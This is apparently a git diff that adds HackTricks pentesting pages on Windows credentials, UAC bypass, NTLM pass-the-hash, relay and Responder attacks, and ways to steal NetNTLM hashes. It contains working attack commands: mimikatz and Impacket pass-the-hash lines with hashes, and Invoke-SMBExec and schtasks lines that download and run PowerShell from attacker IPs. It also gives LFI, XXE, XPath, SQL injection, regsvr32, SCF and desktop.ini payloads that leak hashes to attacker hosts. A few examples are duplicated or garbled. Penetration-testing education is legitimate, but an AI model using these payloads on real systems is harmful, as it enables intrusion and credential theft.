+* [ ] Can you [**dump** the **memory**](windows-local-privilege-escalation/#memory-password-mining) ****of any **process** to extract **passwords**?
+
+### [Services](windows-local-privilege-escalation/#services)
+
+* [ ] [Can you **modify any service**?](windows-local-privilege-escalation/#permissions)
+* [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/#modify-service-binary-path)
+* [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions)
+* [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
+
+### [DLL Hijacking](windows-local-privilege-escalation/#dll-hijacking)
+
+* [ ] Can you **write in any folder inside PATH**?
+* [ ] Is there any known service binary that **tries to load any non-existant DLL**?
+* [ ] Can you **write** in any **binaries folder**?
+
+### [Credentials](windows-local-privilege-escalation/#credentials)
+
+* [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use?
+* [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
+* [ ] [**Wifi netoworks**](windows-local-privilege-escalation/#wifi)?
+* [ ] \*\*\*\*[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
+* [ ] [**Credentials inside "known files"**](windows-local-privilege-escalation/#credentials-inside-files)? Inside the Recycle Bin? At home?
+* [ ] [**Registry with credentials**](windows-local-privilege-escalation/#inside-the-registry)?
+* [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) \(dbs, history, bookmarks....\)?
+* [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/#appcmd-exe)? Credentials?
+* [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)? DLL Side Loading?
+* [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)?
+
+### [AlwaysInstallElevated](windows-local-privilege-escalation/#alwaysinstallelevated)
+
+* [ ] Is this **enabled**?
+
+### [Is vulnerable WSUS?](windows-local-privilege-escalation/#wsus)
+
+* [ ] Is it **vulnerable**?
+
+### [Write Permissions](windows-local-privilege-escalation/#write-permissions)
+
+* [ ] Are you able to **write files that could grant you more privileges**?
+
+### Any [open handler of a privileged process or thread](windows-local-privilege-escalation/#leaked-handlers)?
+
+* [ ] Maybe the compromised process is vulnerable.
+
+### [UAC Bypass](windows-local-privilege-escalation/#check-uac)
+
+* [ ] There are several ways to bypass the UAC
+
+
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%283%29.png)
+
+​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
+
diff --git a/windows/credentials.md b/windows/credentials.md
new file mode 100644
index 00000000..be18a7ee
--- /dev/null
+++ b/windows/credentials.md
@@ -0,0 +1,248 @@
+# Authentication, Credentials, Token privileges, UAC and EFS
+
+## Security Support Provider Interface \(SSPI\)
+
+Is the API that can be use to authenticate users.
+
+The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider \(SSP\), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
+
+### Main SSPs
+
+* **Kerberos**: The preferred one 
+  * %windir%\Windows\System32\kerberos.dll
+* **NTLMv1** and **NTLMv2**: Compatibility reasons 
+  * %windir%\Windows\System32\msv1\_0.dll
+* **Digest**: Web servers and LDAP, password in form of a MD5 hash 
+  * %windir%\Windows\System32\Wdigest.dll
+* **Schannel**: SSL and TLS 
+  * %windir%\Windows\System32\Schannel.dll
+* **Negotiate**: It is used to negotiate the protocol to use \(Kerberos or NTLM being Kerberos the default one\) 
+  *  %windir%\Windows\System32\lsasrv.dll
+
+#### The negotiation could offer several methods or only one.
+
+## Local Security Authority \(LSA\)
+
+The **credentials** \(hashed\) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.  
+**LSA** administrates the local **security policy** \(password policy, users permissions...\), **authentication**, **access tokens**...  
+LSA will be the one that will **check** for provided credentials inside the **SAM** file \(for a local login\) and **talk** with the **domain controller** to authenticate a domain user.
+
+The **credentials** are **saved** inside the **process** _**LSASS**_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
+
+## Credentials Storage
+
+### Security Accounts Manager \(SAM\)
+
+Local credentials are present in this file, the passwords are hashed.
+
+### LSASS
+
+We have talk about this. Different credentials are saved in the memory of this process.
+
+### LSA secrets
+
+LSA could save in disk some credentials:
+
+* Password of the computer account of the Active Directory \(unreachable domain controller\).
+* Passwords of the accounts of Windows services
+* Passwords for scheduled tasks
+* More \(password of IIS applications...\)
+
+### NTDS.dit
+
+It is the database of the Active Directory. It is only present in Domain Controllers.
+
+### Credential Manager store
+
+Allows browsers and other Windows applications to save credentials.
+
+## Process Privileges
+
+**Privileges:**
+
+* Operations on the system:
+  * loading device drivers
+  * system shutdown
+  * timezone change
+  * ...
+* Assigned to user/group
+
+**Access Rights:**
+
+* Access to securable objects
+  * files/dirs,pipes, registry keys, Windows services, printers, jobs, network shares, access tokens, desktops,...
+* Assignedto object's ACL
+
+## Access Tokens
+
+Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
+
+It is used to describe the security context of a process or a thread.
+
+When a user logins, he is given an access token, and when the user creates a process, an access token derivated from the one of the user is assigned. The token contains information like the SID of the uses, the groups of the user, the privileges assigned to the user and its groups...
+
+You can see this information executing `whoami /all` or using _Process Explorer_ from Sysinternals.
+
+When a local administrator logins, two access tokens are created: One with admin rights and other one with normal rights \(Default one\), and to execute a process as administrator the UAC is involved.
+
+The access token has also a reference of the logon sessions inside the LSASS, this is useful if the process needs to access some objects of the network.
+
+You can see the current logon sessions executing as administrator the binary _logonsessions_ of Sysinternals.  
+You can create a new logon session with new credentials that will be used only in the network:
+
+```text
+runas /user:domain\username /netonly cmd.exe
+```
+
+### Types of tokens
+
+There are 2 types of tokens:
+
+* **Primary**: **Default** security information of the process or thread.
+* **Impersonation**: Allows the process to **act on behalf of another user**. For example, on a client server architecture if the client wants to access some files in the shared folder, the server need a copy of the user token to check if it has sufficient permissions.
+
+#### Impersonate Tokens
+
+Using the _**incognito**_ **module** of metasploit if you have enough privileges you can easily **list** and **impersonate** other **tokens**. This could be useful to perform **actions as if you where the other user**. You could also **escalate privileges** with this technique.
+
+## UAC
+
+UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the  administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
+
+To **differentiate** which process is executed with **low** or **high privileges** **Mandatory Integrity Controls** \(MIC\) are used.  
+There are **5 levels of integrity**:
+
+* **Untrusted**\(0\): Processes launched by members of the Guest group. Writing operations are mostly blocked.
+* **Low**\(1\): Used by _Internet Explorer_. File and registry writing is blocked.
+* **Medium**\(2\): When UAC is enabled, this is the default level of integrity. A process in this level can **request** to **elevate** his **integrity level**.
+* **High**\(3\): Processes running with **administrator privileges**.
+* **System**\(4\): **Services** and other applications \(Wininit, Winlogon, Smss...\)
+
+Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.
+
+Then, to **bypass** the **UAC** \(elevate from **medium** integrity level **to high**\) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
+
+You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ \(of Sysinternals\).
+
+### Check UAC
+
+First you need to check the value of the key **EnableLUA**, if it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
+
+```text
+ reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ 
+```
+
+Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in the same entry of the registry as before \(info from [here](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)\):
+
+* If **`0`** then, UAC won't prompt \(like **disabled**\)
+* If **`1`** the admin is **asked for username and password** to execute the binary with high rights \(on Secure Desktop\)
+* If **`2`** \(**Always notify me**\) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges \(on Secure Desktop\)
+* If **`3`** like `1` but not necessary on Secure Desktop
+* If **`4`** like `2` but not necessary on Secure Desktop
+* if **`5`**\(**default**\) it will ask the administrator to confirm to run non Windows binaries with high privileges
+
+Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**   
+If the value is **`0`**, then, only the **RID 500** user \(**built-in Administrator**\) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
+
+And, finally take a look at the value of the key **`FilterAdministratorToken`**  
+If **`0`**\(default\), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
+
+#### Summary
+
+* If **`EnableLUA=0`**or **doesn't exist**, **no UAC for anyone**
+* If **`EnableLua=1`** and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
+* If **`EnableLua=1`** and **`LocalAccountTokenFilterPolicy=0`** and **`FilterAdministratorToken=0`, No UAC for RID 500 \(Built-in Administrator\)**
+* If **`EnableLua=1`** and **`LocalAccountTokenFilterPolicy=0`** and **`FilterAdministratorToken=1`, UAC for everyone**
+
+### UAC bypass
+
+{% hint style="info" %}
+Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
+{% endhint %}
+
+It is important to mention that it is **much harder to bypass the UAC if it is in the higest security level \(Always\) than if it is in any of the other levels \(Default\).**
+
+The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.  
+All this information can be gathered using the metasploit module: `post/windows/gather/win_privs`
+
+You can also check the groups of your user and get the integrity level:
+
+```text
+net user %username%
+whoami /groups | findstr Level
+```
+
+#### **Very** Basic UAC "bypass" \(full file system access\)
+
+If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB \(file system\) local in a new disk and you will have **access to everything inside the file system** \(even Administrator home folder\)
+
+```bash
+net use Z: \\127.0.0.1\c$
+cd C$
+
+#Or you could just access it:
+dir \\127.0.0.1\c$\Users\Administrator\Desktop
+```
+
+#### UAC bypass exploits
+
+You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables \(like_Source\Akagi\outout\x64\Debug\Akagi.exe_\) , you will need to know **which one you need.**  
+You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
+
+**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**. 
+
+#### More UAC bypass
+
+**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim \(a common nc.exe shell is not enough\).
+
+You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
+
+![](../.gitbook/assets/image%20%2849%29.png)
+
+\(_explorer.exe_ should works\)
+
+### Your own bypass - Basic UAC bypass methodology
+
+If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y \(mainly writing the malicious dll on _C:\Windows\System32_\). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md).
+
+1. Find a binary that will **autoelevate** \(check that when it is executed it runs in a high integrity level\).
+2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
+3. You probably will need to **write** the DLL inside some **protected paths** \(like C:\Windows\System32\) were you don't have writing permissions. You can bypass this using:
+   1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths \(because this tool is executed from a high integrity level\).
+   2. **IFileOperation**: Windows 10.
+4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
+
+#### Another UAC bypass technique
+
+Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** \(this is more interesting if the binary searches this information inside the **HKCU**\).
+
+## EFS \(Encrypted File System\)
+
+EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**.  The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate \(used to encrypt the file\) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
+
+Examples of files being decrypted without the user asking for it: 
+
+* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table). 
+* Encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network.
+
+The encrypted files using this method can be **tansparently access by the owner user** \(the one who has encrypted them\), so if you can **become that user** you can decrypt the files \(changing the password of the user and logins as him won't work\).
+
+### Check EFS info
+
+Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
+
+Check **who** has **access** to the file using cipher /c &lt;file&gt;  
+You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
+
+### Decrypting EFS files 
+
+#### Being Authority System
+
+This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user \(`impersonate_token` from `incognito`\). Or you could just `migrate` to process of the user.
+
+#### Knowing the users password
+
+{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
+
+
+
diff --git a/windows/ntlm/README.md b/windows/ntlm/README.md
new file mode 100644
index 00000000..9c311c24
--- /dev/null
+++ b/windows/ntlm/README.md
@@ -0,0 +1,206 @@
+# NTLM
+
+## Basic Information
+
+**NTLM Credentials**: Domain name \(if any\), username and password hash.
+
+**LM** is only **enabled** in **Windows XP and server 2003** \(LM hashes can be cracked\). The LM hash AAD3B435B51404EEAAD3B435B51404EE means that LM is not being used \(is the LM hash of empty string\).
+
+By default **Kerberos** is **used**, so NTLM will only be used if **there isn't any Active Directory configured,** the **Domain doesn't exist**, **Kerberos isn't working** \(bad configuration\) or the **client** that tries to connect using the IP instead of a valid host-name.
+
+The **network packets** of a **NTLM authentication** have the **header** "**NTLMSSP**".
+
+The protocols: LM, NTLMv1 and NTLMv2 are supported in the DLL %windir%\Windows\System32\msv1\_0.dll
+
+## LM, NTLMv1 and NTLMv2
+
+You can check and configure which protocol will be used:
+
+### GUI
+
+Execute _secpol.msc_ -&gt; Local policies -&gt; Security Options -&gt; Network Security: LAN Manager authentication level. There are 6 levels \(from 0 to 5\).
+
+![](../../.gitbook/assets/image%20%2875%29.png)
+
+### Registry
+
+This will set the level 5:
+
+```text
+reg add HKLM\SYSTEM\CurrentControlSet\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
+```
+
+## Basic NTLM Domain authentication Scheme
+
+1. The **user** introduces his **credentials**
+2. The client machine **sends an authentication request** sending the **domain name** and the **username**
+3. The **server** sends the **challenge**
+4. The **client encrypts** the **challenge** using the hash of the password as key and sends it as response
+5. The **server sends** to the **Domain controller** the **domain name, the username, the challenge and the response**. If there **isn't** an Active Directory configured or the domain name is the name of the server, the credentials are **checked locally**.
+6. The **domain controller checks if everything is correct** and sends the information to the server
+
+The **server** and the **Domain Controller** are able to create a **Secure Channel** via **Netlogon** server as the Domain Controller know the password of the server \(it is inside the **NTDS.DIT** db\).
+
+### Local NTLM authentication Scheme
+
+The authentication is as the one mentioned **before but** the **server** knows the **hash of the user** that tries to authenticate inside the **SAM** file. So, instead of asking the Domain Controller, the **server will check itself** if the user can authenticate.
+
+### NTLMv1 Challenge
+
+The **challenge length is 8 bytes** and the **response is 24 bytes** long.
+
+The **hash NT \(16bytes\)** is divided in **3 parts of 7bytes each** \(7B + 7B + \(2B+0x00\*5\)\): the **last part is filled with zeros**. Then, the **challenge** is **ciphered separately** with each part and the **resulting** ciphered bytes are **joined**. Total: 8B + 8B + 8B = 24Bytes.
+
+**Problems**:
+
+* Lack of **randomness**
+* The 3 parts can be **attacked separately** to find the NT hash
+* **DES is crackable**
+* The 3º key is composed always by **5 zeros**.
+* Given the **same challenge** the **response** will be **same**. So, you can give as a **challenge** to the victim the string "**1122334455667788**" and attack the response used **precomputed rainbow tables**.
+
+### NTLMv2 Challenge
+
+The **challenge length is 8 bytes** and **2 responses are sent**: One is **24 bytes** long and the length of the **other** is **variable**.
+
+**The first response** is created by ciphering using **HMAC\_MD5** the **string** composed by the **client and the domain** and using as **key** the **hash MD4** of the **NT hash**. Then, the **result** will by used as **key** to cipher using **HMAC\_MD5** the **challenge**. To this, **a client challenge of 8 bytes will be added**. Total: 24 B.
+
+The **second response** is created using **several values** \(a new client challenge, a **timestamp** to avoid **replay attacks**...\)
+
+## Pass-the-Hash
+
+**Once you have the hash of the victim**, you can use it to **impersonate** it.  
+You need to use a **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.
+
+**Please, remember that you can perform Pass-the-Hash attacks also using Computer accounts.**
+
+### **Mimikatz**
+
+**Needs to be run as administrator**
+
+```bash
+Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"' 
+```
+
+This will launch a process that will belongs to the users that have launch mimikatz but internally in LSASS the saved credentials are the ones inside the mimikatz parameters. Then, you can access to network resources as if you where that user \(similar to the `runas /netonly` trick but you don't need to know the plain-text password\).
+
+### Pass-the-Hash from linux
+
+You can obtain code execution in Windows machines using Pass-the-Hash from Linux.   
+[**Access here to learn how to do it.**](../../pentesting/pentesting-smb.md#execute)\*\*\*\*
+
+### Impacket Windows compiled tools
+
+You can download[ impacket binaries for Windows here](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries).
+
+* **psexec\_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
+* **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
+* **atexec.exe** \(In this case you need to specify a command, cmd.exe and powershell.exe are not valid to obtain an interactive shell\)`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
+* There are several more Impacket binaries...
+
+### Invoke-TheHash
+
+You can get the powershell scripts from here: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)
+
+#### Invoke-SMBExec
+
+```text
+Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
+```
+
+#### Invoke-WMIExec
+
+```text
+Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
+```
+
+#### Invoke-SMBClient
+
+```text
+Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
+```
+
+#### Invoke-SMBEnum
+
+```text
+Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
+```
+
+#### Invoke-TheHash
+
+This function is a **mix of all the others**. You can pass **several hosts**, **exclude** someones and **select** the **option** you want to use \(_SMBExec, WMIExec, SMBClient, SMBEnum_\). If you select **any** of **SMBExec** and **WMIExec** but you **don't** give any _**Command**_ parameter it will just **check** if you have **enough permissions**.
+
+```text
+Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0
+```
+
+### [Evil-WinRM Pass the Hash](../../pentesting/5985-5986-pentesting-winrm.md#using-evil-winrm)
+
+### Windows Credentials Editor \(WCE\)
+
+**Needs to be run as administrator**
+
+This tool will do the same thing as mimikatz \(modify LSASS memory\).
+
+```text
+wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
+```
+
+### Manual Windows remote execution with username and password
+
+* \*\*\*\*[**PsExec**](psexec-and-winexec.md)\*\*\*\*
+* [**SmbExec**](smbexec.md)\*\*\*\*
+* \*\*\*\*[**WmicExec**](wmicexec.md)\*\*\*\*
+* \*\*\*\*[**AtExec**](atexec.md)\*\*\*\*
+
+## Extracting credentials from a Windows Host
+
+**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-credentials/)**.**
+
+## More about NTLM Relay and Responder
+
+**Read** [**here a more detailed guide**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) **on howto perform those attacks**
+
+## NTLM relay
+
+Because of how the NTLM authentication behaves, if you could make a **client to authenticate against you**, you could **use its credentials to access another machine**. This will work by sending the **same challenge** that the **server sends to you to the victim**, and send the **response of the challenge of the victim to the server**. You won't even need to crack the challenge response of the victim because you will use it to connect to another machine.
+
+You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`
+
+The  option `SRVHOST` is used to point the server **were you want to get access**.  
+Then, when **any host try to authenticate against you**, metasploit will **try to authenticate against the other** server.
+
+You **can't authenticate against the same host that is trying to authenticate against you** \(MS08-068\). **Metasploit** will **always** send a "_**Denied**_" **response** to the **client** that is trying to connect to you.
+
+You can also perform this attack using the **impacket tool**: _**smbrelayx.py**_
+
+```text
+smbrelayx.py .h <HOST_to_attack> [-c <Command_to_exec>] [-e <path_to_binary_to_exec>]
+```
+
+This **attack can be easily solved implementing SMB** _**Signing**_ \(by default only Windows servers implements that option\).
+
+Read: [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
+
+## Getting Credentials with Responder
+
+Responder will create a lot of services that can **capture credentials when someone try to access them**. It can also send **fake DNS responses** \(so the IP of the attacker is resolved\) and can inject **PAC files** so the victim will get the IP of the **attacker as a proxy**.
+
+```text
+responder.py -I <interface> -w On #If the computer detects the LAN configuration automatically, this will impersonate it
+```
+
+You can also **resolve NetBIOS** requests with **your IP**. And create an **authentication proxy**:
+
+```text
+responder.py -I <interface> -rPv
+```
+
+You won't be able to intercept NTLM hashes \(normally\), but you can easly grab some **NTLM challenges and responses** that you can **crack** using for example _**john**_ option `--format=netntlmv2`.
+
+The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
+
+## Parse NTLM challenges from a network capture
+
+**You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)\*\*\*\*
+
diff --git a/windows/ntlm/atexec.md b/windows/ntlm/atexec.md
new file mode 100644
index 00000000..161dfa8b
--- /dev/null
+++ b/windows/ntlm/atexec.md
@@ -0,0 +1,21 @@
+# AtExec / SchtasksExec
+
+## How Does it works
+
+At allows to schedule tasks in hosts where you know username/\(password/Hash\). So, you can use it to execute commands in other hosts and get the output.
+
+```text
+At \\victim 11:00:00PM shutdown -r
+```
+
+Using schtasks you need first to create the task and then call it:
+
+```text
+schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
+schtasks /run /tn <TASK_NAME> /S <VICTIM>
+```
+
+```text
+schtasks /create /S dcorp-dc.my.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "UserX" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
+```
+
diff --git a/windows/ntlm/places-to-steal-ntlm-creds.md b/windows/ntlm/places-to-steal-ntlm-creds.md
new file mode 100644
index 00000000..3fb202b0
--- /dev/null
+++ b/windows/ntlm/places-to-steal-ntlm-creds.md
@@ -0,0 +1,593 @@
+# Places to steal NTLM creds
+
+**All this POST was copied from:** [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)\*\*\*\*
+
+## \*\*\*\*[Places of Interest in Stealing NetNTLM Hashes](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
+
+One day me and @m3g9tr0n were discussing different places where we can use responder in stealing NetNTLM hashes. After experimenting I thought of writing this post along with some cool findings in the world of Windows. SMBRelay attacks are also possible in these scenarios.
+
+## LFI
+
+The include\(\) in PHP will resolve the network path for us.
+
+```text
+http://host.tld/?page=//11.22.33.44/@OsandaMalith
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/03/lfi.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/lfi.png)
+
+## XXE
+
+In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
+
+```markup
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" >
+]>
+<root>
+  <name></name>
+  <tel></tel>
+  <email>OUT&xxe;OUT</email>
+  <password></password>
+</root>
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/03/xxe.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/xxe.png)  
+
+
+## XPath Injection
+
+Usually, doc\(\) is used in out-of-band XPath injections, thus can be applied in resolving a network path.
+
+```text
+http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/03/xpath.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/xpath.png)
+
+## MySQL Injection
+
+I have written a complete [post ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/)on MySQL out-of-band injections which can be applied over the internet. You can also use ‘INTO OUTFILE’ to resolve a network path.
+
+```text
+http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/02/overinternet.png?w=640)](https://osandamalith.files.wordpress.com/2017/02/overinternet.png)
+
+## MSSQL
+
+Since stacked queries are supported we can call stored procedures.
+
+```text
+';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
+```
+
+## Regsvr32
+
+Accidently found this one while experimenting with .sct files.
+
+```text
+regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/03/regsvr32.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/regsvr32.png)
+
+## Batch
+
+There are many possible ways you can explore
+
+```text
+echo 1 > //192.168.0.1/abc
+pushd \\192.168.0.1\abc
+cmd /k \\192.168.0.1\abc
+cmd /c \\192.168.0.1\abc
+start \\192.168.0.1\abc
+mkdir \\192.168.0.1\abc
+type\\192.168.0.1\abc
+dir\\192.168.0.1\abc
+find, findstr, [x]copy, move, replace, del, rename and many more!
+```
+
+[![](https://osandamalith.files.wordpress.com/2017/03/batch.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/batch.png)
+
+## Auto-Complete
+
+You just need to type ‘\\host\’ the auto-complete will do the trick under the explorer and the run dialog box.  
+[![](https://osandamalith.files.wordpress.com/2017/03/explorer.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/explorer.png)
+
+[![](https://osandamalith.files.wordpress.com/2017/03/run.png?w=640)](https://osandamalith.files.wordpress.com/2017/03/run.png)
+
+## Autorun.inf
+
+Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
+
+```text
+[autorun]
+open=\\35.164.153.224\setup.exe
+icon=something.ico
+action=open Setup.exe
+```
+
+## Shell Command Files
+
+You can save this as something.scf and once you open the folder explorer will try to resolve the network path for the icon.
+
+```text
+[Shell]
+Command=2
+IconFile=\\35.164.153.224\test.ico
+[Taskbar]
+Command=ToggleDesktop
+```
+
+## Desktop.ini
+
+The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
+
+```text
+mkdir openMe
+attrib +s openMe
+cd openMe
+echo [.ShellClassInfo] > desktop.ini
+echo IconResource=\\192.168.0.1\aa >> desktop.ini
+attrib +s +h desktop.ini
+```
+
